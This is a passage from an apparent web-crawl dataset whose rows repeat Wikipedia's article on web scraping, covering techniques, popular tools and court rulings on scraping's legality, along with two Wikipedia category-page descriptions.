Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
514 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Articles_with_short_description | This category is for articles with short descriptions defined on Wikipedia by short description (either within the page itself or via another template). This category has the following 4 subcategories, out of 4 total. The following 200 pages are in this category, out of approximately 5,607,051 total. This list may not reflect recent changes. |
515 | https://en.wikipedia.org/wiki/Web_scraping | https://en.m.wikipedia.org/w/index.php?title=Web_scraping&mobileaction=toggle_view_mobile | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
516 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Software | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
517 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:Articles_containing_potentially_dated_statements_from_2007 | Articles in this category contain statements that may become dated originating from 2007. These may need to be updated, removed, or put into context as historical. Articles containing older statements are more likely to be dated. This is not a backlog; not all articles in this category will need updating at this point in time. Use As of to mark all individual statements that may become dated, this will automatically add them to the appropriate categories. Wherever possible, use Update after to mark exactly when statements will need updating in addition to using As of . This category has the following 12 subcategories, out of 12 total. The following 200 pages are in this category, out of approximately 2,189 total. This list may not reflect recent changes. |
